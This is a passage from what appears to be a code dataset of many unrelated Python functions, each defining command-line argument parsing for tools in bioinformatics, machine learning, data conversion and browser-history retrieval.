parser.parse_args()\n return args", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration 
options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def handle_cmdline_args():\n\n parser = argparse.ArgumentParser(\n description='Generate synthetic data from a specification in a json '\n 'file using the \"synth-method\" described in the json file. ')\n\n parser.add_argument(\n '-i', dest='infile', required=True,\n help='The input json file. Must contain a \"synth-method\" property')\n\n parser.add_argument(\n '-o', dest='outfile_prefix', required=True, help='The prefix of the output paths (data json and csv), relative to the QUIPP-pipeline root directory')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"auth\",\n help=\"authentication string for Infermedica API: \"\n \"APP_ID:APP_KEY or path to file containing it.\")\n parser.add_argument(\"--model\",\n help=\"use non-standard Infermedica model/language, \"\n \"e.g. 
infermedica-es\")\n args = parser.parse_args()\n return args", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def _parse_args():\n args = sys.argv[1:]\n cmd_parser = argparse.ArgumentParser()\n cmd_parser.add_argument(\n '--produce-sub',\n dest='produce_sub',\n help='Produce submision file',\n default=False,\n action='store_true',\n )\n cmd_parser.add_argument(\n '--search-cv',\n dest='search_cv',\n help='Perform Search of parameters',\n default=False,\n action='store_true',\n )\n cmd_opts = cmd_parser.parse_args(args=args)\n return cmd_opts", "def parse_command_line():\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"ni:ht:\",\n [\"dry-run\", \"interval=\", \"help\", \"timestamp=\"])\n except getopt.error, msg:\n print msg\n print \"for help use --help.\"\n sys.exit(2)\n\n options = {}\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print __doc__\n sys.exit(0)\n elif o in (\"-n\", \"--dry-run\"):\n sys.exit(4) # not yet supported...\n elif o in (\"-i\", \"--interval\"):\n options['interval'] = int(a)\n elif o in (\"-t\", \"--timestamp\"):\n options['timestamp'] = a\n else:\n sys.exit(3) # how did we get here?\n # And what are left as args must be our filter list.\n options['sieves'] = args\n return options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n \"config_path\",\n type=str,\n help=\"Path to the JSON configuration file containing the image transformation settings.\",\n )\n parser.add_argument(\n \"img_path\",\n type=str,\n help=\"Path to the input image file to apply transformations.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse_args():\n 
parser = argparse.ArgumentParser(description=_program_description)\n parser.add_argument('input_file', help=_input_file_description)\n #parser.add_argument('-v', '--verbose', action='store_true', \n # default=False, help='show progress')\n args = parser.parse_args()\n return args", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_cmdline(get_parser=get_parser_files):\n return get_parser().parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"generate training data of apks\")\n parser.add_argument(\"-i\", action=\"store\", dest=\"input_file\",\n required=True, help=\"input json file to predict\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"output_file\",\n required=True, help=\"file path to store predicted data\")\n parser.add_argument(\"-server\", action=\"store\", dest=\"server_url\", default=\"http://localhost:5745\",\n required=False, help=\"url of nice2predict server\")\n options = parser.parse_args()\n print options\n return options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"dem process\")\n parser.add_argument(\"--data_dir\", type=str, default=\"/home/dataset/DEM_data/\",\n help=\"path where the dataset is saved\")\n args_opt = parser.parse_args()\n return args_opt", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def _parse_args(argv):\n result = {}\n for arg in argv:\n k, v = arg.split(\"=\")\n result[k] = v\n return result", "def parse_arguments(self,parser):\r\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-model\", help=\"Path to read input model from\")\n options = parser.parse_args()\n return options", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. 
By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def commandline():\n command_parser = argparse.ArgumentParser(description=__doc__, epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter)\n command_parser.add_argument('-i','--input_file', type=str, required=True, help='input file.')\n command_parser.add_argument('-o','--output_file', type=str, required=True, help='output file.')\n args = command_parser.parse_args()\n return args", "def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def arg_parse():\n parser = argparse.ArgumentParser()\n # defines command line arguments\n parser.add_argument('-i', '--input_file', help=\"The input .txt file \" +\n \"within the current directory (the file you \" +\n \"downloaded from VEP\")\n parser.add_argument('-o', '--output_file', help=\"Name for the output \" +\n \".txt file\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\"Run arguments for system submitted tasks\")\n\n parser.add_argument(\"-f\", \"--funcs\", type=str, nargs=\"?\", required=True,\n help=\"path to pickle file containing a list of \"\n \"functions/methods that should be run by the \"\n \"submitted process\"\n )\n parser.add_argument(\"-k\", \"--kwargs\", type=str, nargs=\"?\", required=False,\n default=None,\n help=\"path to pickle file containing a dictionary of \"\n \"keyword argumnets that should be passed to the \"\n \"functions\")\n parser.add_argument(\"-e\", \"--environment\", type=str, nargs=\"?\",\n required=False,\n help=\"Optional comma-separated environment variables, \"\n \"which should be given as \"\n \"VARNAME1=value1,VARNAME2=value2 and so on. 
These \"\n \"will be separated and instantiated into Python's \"\n \"os.environ\")\n\n return parser.parse_args()", "def make_parser():\n parser_ = argparse.ArgumentParser(\n description=\"\"\"\n A tool to retrieve history from\n (almost) any browser on (almost) any platform\n\n██████╗ ██████╗ ██████╗ ██╗ ██╗███████╗███████╗██████╗ ██╗ ██╗██╗███████╗████████╗ ██████╗ ██████╗ ██╗ ██╗\n██╔══██╗██╔══██╗██╔═══██╗██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗╚██╗ ██╔╝\n██████╔╝██████╔╝██║ ██║██║ █╗ ██║███████╗█████╗ ██████╔╝█████╗███████║██║███████╗ ██║ ██║ ██║██████╔╝ ╚████╔╝\n██╔══██╗██╔══██╗██║ ██║██║███╗██║╚════██║██╔══╝ ██╔══██╗╚════╝██╔══██║██║╚════██║ ██║ ██║ ██║██╔══██╗ ╚██╔╝\n██████╔╝██║ ██║╚██████╔╝╚███╔███╔╝███████║███████╗██║ ██║ ██║ ██║██║███████║ ██║ ╚██████╔╝██║ ██║ ██║\n╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝\n \"\"\", # noqa: E501\n epilog=\"\"\"\n Checkout the GitHub repo\n https://github.com/pesos/browser-history\n if you have any issues or want to help contribute\"\"\",\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser_.add_argument(\n \"-t\",\n \"--type\",\n default=\"history\",\n help=f\"\"\"\n argument to decide whether to retrieve history or bookmarks.\n Should be one of {AVAILABLE_TYPES}.\n Default is history.\"\"\",\n )\n parser_.add_argument(\n \"-b\",\n \"--browser\",\n default=\"all\",\n help=f\"\"\"\n browser to retrieve history or bookmarks from. Should be one\n of all, default, {AVAILABLE_BROWSERS}.\n Default is all (gets history or bookmarks from all browsers).\n \"\"\",\n )\n\n parser_.add_argument(\n \"-f\",\n \"--format\",\n default=\"infer\",\n help=f\"\"\"\n Format to be used in output. Should be one of {AVAILABLE_FORMATS}.\n Default is infer (format is inferred from the output file's\n extension. If no output file (-o) is specified, it defaults to csv)\"\"\",\n )\n\n parser_.add_argument(\n \"-o\",\n \"--output\",\n default=None,\n help=\"\"\"\n File where history output or bookmark output is to be written.\n If not provided, standard output is used.\"\"\",\n )\n\n parser_.add_argument(\n \"-p\",\n \"--profile\",\n default=None,\n help=\"\"\"\n Specify the profile from which to fetch history or bookmarks. If\n not provided all profiles are fetched\n \"\"\",\n )\n\n parser_.add_argument(\n \"--show-profiles\",\n default=None,\n metavar=\"BROWSER\",\n help=f\"\"\"\n List all available profiles for a given browser where browser\n can be one of default, {AVAILABLE_BROWSERS}. 
The browser\n must always be provided.\n \"\"\",\n )\n\n parser_.add_argument(\n \"-v\", \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n\n return parser_", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\"\"balances_to_merkle_root script.\n\n Expects a JSON file that contains tree height and vaults data, and prints the root of the\n corresponding merkle tree.\n \"\"\")\n parser.add_argument('--balances_file', required=True,\n help='Json file containing the vaults balances.')\n parser.add_argument('--workers', type=int, default=8)\n\n args = parser.parse_args()\n return args", "def _parse_arg_list(self):\n\t\targ_list = {}\n\t\tfor arg in getopt.getopt(sys.argv[1:], 'c:r:j:d')[0]:\n\t\t\targ_list[arg[0][1:]] = arg[1]\n\t\n\t\treturn arg_list", "def parse_command_line():\n parser = ArgumentParser(description=__doc__,\n formatter_class=RawTextHelpFormatter,\n epilog=\"For a list of table formats check this page: \"\n \"https://github.com/astanin/python-tabulate#table-format\"\n )\n requir = parser.add_argument_group(\"required arguments\")\n requir.add_argument(\"-f\", \"--find\",\n required=True,\n help=\"Search string to identify\"\n )\n requir.add_argument(\"-k\", \"--client_id\",\n required=True,\n help=\"CrowdStrike API client ID\"\n )\n requir.add_argument(\"-s\", \"--client_secret\",\n required=True,\n help=\"CrowdStrike API client secret\"\n )\n parser.add_argument(\"-r\", \"--reverse\",\n help=\"Reverse the sort.\",\n default=False,\n action=\"store_true\"\n )\n parser.add_argument(\"-t\", \"--types\",\n help=\"Types to search (indicator, report or actor). Comma delimited.\"\n )\n parser.add_argument(\"-tf\", \"--table_format\",\n help=\"Set the table format.\",\n default=\"fancy_grid\"\n )\n parser.add_argument(\"-o\", \"--output_prefix\",\n help=\"Output filename prefix for storing results (CSV format).\",\n default=None\n )\n\n parsed = parser.parse_args()\n allow = [\"indicator\", \"report\", \"actor\"]\n parsed.types = [t for t in parsed.types.split(\",\") if t in allow] if parsed.types else allow\n\n return parsed", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_cmdline_args():\n parser = argparse.ArgumentParser(description=\"Guesses the functional element for host.\")\n ##\n ## Internal options\n ##\n parser.add_argument(\"--json\", dest=\"json\", action='store_true', help=\"output in JSON\")\n\n ##\n ## PuppetDB options\n ##\n pdbconf = PdbConfig()\n pdbconf.add_standard_args(parser)\n\n parser.add_argument(\"host\", metavar=\"HOST\",\n help=\"hostnames to query for FE\")\n\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file 
(.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"in_fq\", help=\"The fastq file containing Hi-C reads.\")\n parser.add_argument(\n \"-r\",\n \"--reference\",\n required=True,\n help=\"Path to the reference genome, in FASTA format.\",\n )\n parser.add_argument(\n \"-p\",\n \"--nb_processors\",\n default=1,\n type=int,\n help=\"number of CPUs used for alignment.\",\n )\n parser.add_argument(\n \"-o\",\n \"--out_sam\",\n help=\"Path to the output SAM file for the alignment of in_fq.\",\n )\n parser.add_argument(\n \"-T\",\n \"--tempdir\",\n default=\".\",\n help=\"Directory to write temporary files. Defaults to current directory.\",\n )\n parser.add_argument(\n \"-m\",\n \"--minimap2\",\n default=False,\n action=\"store_true\",\n help=\"Use minimap2 instead of bowtie for the alignment.\",\n )\n parser.add_argument(\n \"-l\",\n \"--min_len\",\n type=int,\n default=20,\n help=\"Minimum length to which reads should be truncated.\",\n )\n return parser.parse_args()", "def parsed_args():\n parser = ArgumentParser()\n parser.add_argument(\n \"--input_csv\",\n default=\"bios.csv\",\n type=str,\n help=\"CSV containing the info from the form\",\n )\n parser.add_argument(\n \"--output_yml\",\n default=\"bios.yml\",\n type=str,\n help=\"Output YAML file\",\n )\n parser.add_argument(\n \"--output_photos\",\n default=\"./assets/img/team/team-photos\",\n type=str,\n help=\"List of photos URL\",\n )\n\n return parser.parse_args()", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... 
copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def generate_parser():\n description = \"%(prog)s -- Predict RNA expression from cCREs and Ideas states\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('-r', '--rna', dest=\"rna\", type=str, action='store', required=True,\n help=\"RNA expression file\")\n parser.add_argument('-s', '--state', dest=\"state\", type=str, action='store', required=True,\n help=\"State file\")\n parser.add_argument('-c', '--cre', dest=\"cre\", type=str, action='store', required=True,\n help=\"CRE file\")\n parser.add_argument('-l', '--lessone', dest=\"lessone\", type=int, action='store', default=0,\n help=\"Cell type to leave out\")\n parser.add_argument('-o', '--output', dest=\"output\", type=str, action='store', default='./out',\n help=\"Output prefix\")\n parser.add_argument('-i', '--iterations', dest=\"iterations\", type=int, action='store', default=100,\n help=\"Refinement iterations\")\n parser.add_argument('-t', '--threads', dest=\"threads\", type=int, action='store', default=1,\n help=\"Number of threads to use\")\n parser.add_argument('--initialization-dist', dest=\"init_dist\", type=int, action='store', default=1000,\n help=\"Beta initialization distance cutoff\")\n parser.add_argument('--promoter-dist', dest=\"promoter_dist\", type=int, action='store',\n help=\"If specified, learn betas for promoters up to promoter distance cutoff\")\n parser.add_argument('--cre-dist', dest=\"cre_dist\", type=int, action='store',\n help=\"CRE distance cutoff\")\n parser.add_argument('--cre-exclude-promoter', dest=\"cre_noprom\", action='store_true',\n help=\"Exclude promoter from CREs\")\n parser.add_argument('--sum-cres', dest=\"sum_cres\", action='store_true',\n help=\"Sum CREs instead of finding overall proportions\")\n parser.add_argument('--correlation', dest=\"correlation\", type=float, action='store', default=0.0,\n help=\"Initial correlation cutoff\")\n parser.add_argument('--pca', dest=\"pca\", type=float, action='store',\n help=\"Convert state ratios into PCAs explaining this much variance\")\n parser.add_argument('--trainstats', dest=\"train_stats\", action='store_true',\n help=\"Output training statistics\")\n parser.add_argument('--max-CREs', dest=\"max_cres\", action='store', type=int, default=0,\n help=\"Maximum number of CREs allowed to be selected per TSS at a time (0 is no max)\")\n parser.add_argument('--skip-training', dest=\"skip_training\", action='store_true',\n help=\"Skip CRE-TSS pairining refinement\")\n parser.add_argument('--shuffle-states', dest=\"shuffle_states\", action='store_true',\n help=\"Shuffle the state proportions of each CRE as a negative control\")\n parser.add_argument('-e', '--eRP', dest=\"eRP\", action='store', type=str,\n help=\"A previously generated eRP TSS-cCRE pair file. 
Passing this will ignore initial TSS-CRE pair selection\")\n parser.add_argument('--seed', dest=\"seed\", action='store', type=int,\n help=\"Random number generator state seed\")\n parser.add_argument('-v', '--verbose', dest=\"verbose\", action='store', type=int, default=2,\n help=\"Verbosity level\")\n return parser", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n return parser.parse_args()", "def handle_arguments():\n result = {'input_pkg':'', 'output_pkg':''}\n\n try:\n args = sys.argv[1:]\n optlist = gnu_getopt(args, 'h', ['help'])\n except GetoptError:\n print 'Error when parsing arguments.'\n more_informations()\n\n if len(sys.argv) < 2:\n print 'No input file.'\n more_informations()\n\n for option, value in optlist[0]:\n if option in ['-h', '--help']:\n usage()\n \n result['input_pkg'] = optlist[1][0]\n\n if len(sys.argv) > 3:\n result['output_pkg'] = optlist[1][1]\n\n return result", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Eval')\n parser.add_argument(\n '--cfg', help='experiment configure file path', type=str, \\\n default=\"validation.config.Config\")\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Arguments get parsed via --commands')\n \n parser.add_argument('-in', dest='input', type=str, \n help=\"Specify the RTStruct file read.\")\n parser.add_argument('--out', dest='output', type=str, default=\"RTSS_info.json\",\n help=\"Specify the RTStruct file read.\")\n \n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\n \"This script receives 'grouped_hits.txt', uses a FASTA file to get the \\\n \\nsequences, uses MAFFT to align each group, then generates a consensus \\\n \\nsequence for each group using biopython.\\n\\n \\\n Example: python {0} -g grouped_hits.txt -f sequences.fasta\".format(argv[0]),\n formatter_class = argparse.RawDescriptionHelpFormatter)\n \n requiredNamed = parser.add_argument_group('required arguments')\n\n requiredNamed.add_argument(\"-g\", \"--GROUPS\", type=str, required=True,\\\n help=\"Grouped hits file generated by group_self_BLAST.py\", action=\"store\")\n\n requiredNamed.add_argument(\"-f\", \"--FASTA\", type=str, required=True,\\\n help=\"FASTA file containing all sequences.\", action=\"store\")\n\n return parser.parse_args()", "def get_args_from_command_line():\n 
parser = argparse.ArgumentParser()\n parser.add_argument(\"--country_code\", type=str,\n help=\"Country code\",\n default=\"US\")\n parser.add_argument(\"--n_workers\", type=int, help=\"number of workers\",\n default=20)\n parser.add_argument(\"--survey_link\", type=str)\n parser.add_argument(\"--block_size\", help='number of tweets per worker', type=int)\n parser.add_argument(\"--version_number\", type=str)\n parser.add_argument(\"--mode\", type=str, help='Whether to create HIT in sandbox or in production')\n parser.add_argument(\"--language_qualification\", type=int, help='')\n\n args = parser.parse_args()\n return args", "def get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\",\n help=\"text file, one compound per line\", required=True)\n parser.add_argument(\"-j\", \"--jsononto\",\n help=\"json ontology of families\", required=True)\n parser.add_argument(\"-o\", \"--output\",\n help=\"output file\", required=True)\n parser.add_argument(\"-e\", \"--encoded\",\n help=\"identifiers are encoded\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n run_analysis(args.input, args.jsononto, args.output, args.encoded)", "def parse_args():\n # Argument objects\n argument_objects = [\n FindInterfaceArg(),\n InterfaceArg(),\n NaughtyCountArg(),\n FirewallArg(),\n ModelTypeArg(),\n LogArg(),\n ]\n\n # Create the parser and parse the args\n parser = create_parser(argument_objects)\n parsed_args = parser.parse_args()\n options = {}\n\n # Parse all of the options\n for obj in argument_objects:\n if not obj.process_argument(parsed_args, options):\n parser.print_usage()\n exit()\n\n return options", "def parse_commandline_args():\n\n epilog = \"\"\"\n The configuration file must contained a JSON-encoded map. 
Example: \"{\"name\":\"foo\"}\".\n \"\"\"\n\n parser = utils.ConnectionArgumentParser(\n description=\"Update config (key/value pairs) on a board\", epilog=epilog\n )\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=\"JSON file to load config from (default stdin)\",\n type=open,\n default=sys.stdin,\n dest=\"file\",\n )\n parser.add_argument(\n \"ids\", metavar=\"DEVICEID\", nargs=\"+\", type=int, help=\"Device IDs to flash\"\n )\n\n return parser.parse_args()", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def parse():\n\n args = sys.argv\n if os.name == 'nt' and args and 'python' in os.path.basename(args[0]).lower():\n args = args[2:]\n else:\n args = args[1:]\n args = vars(parser.parse_args(args))\n \n # set the global verbosity level of the script\n script.set_verbosity(args['verbosity']) \n \n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Parse flags to configure the json parsing')\n parser.add_argument(\"-f\", \"--format\", help=\"output format: (csv|tsv|json)\", choices=[\"csv\", \"tsv\", \"json\"],\n default=\"tsv\")\n parser.add_argument(\"-p\", \"--parallelized\", help=\"save output in parallelized or single file format\",\n action=\"store_true\")\n parser.add_argument(\"-i\", \"--input\", help=\"folder where input documents are\", default=\"data\")\n parser.add_argument(\"-o\", \"--output\", help=\"folder where output documents are\", default=\"cleaned\")\n parser.add_argument(\"-d\", \"--documentformat\", help=\"combine all features into a single text per post\",\n action=\"store_true\")\n parser.add_argument(\"-pa\", \"--partitions\", help=\"number of spark partitions\",\n default=1)\n args = parser.parse_args()\n return args", "def main(argv,required_arg,required_arg_type,optional_arg):\n \n # add optional_arguments to the parser\n for option in optional_arg:\n parse_option_dictionary[option]()\n \n # parse the command line\n passed_optional_arg, passed_required_arg = parser.parse_args(argv)\n \n required_arg_values = grabRequiredArgs(passed_required_arg,required_arg,\n 
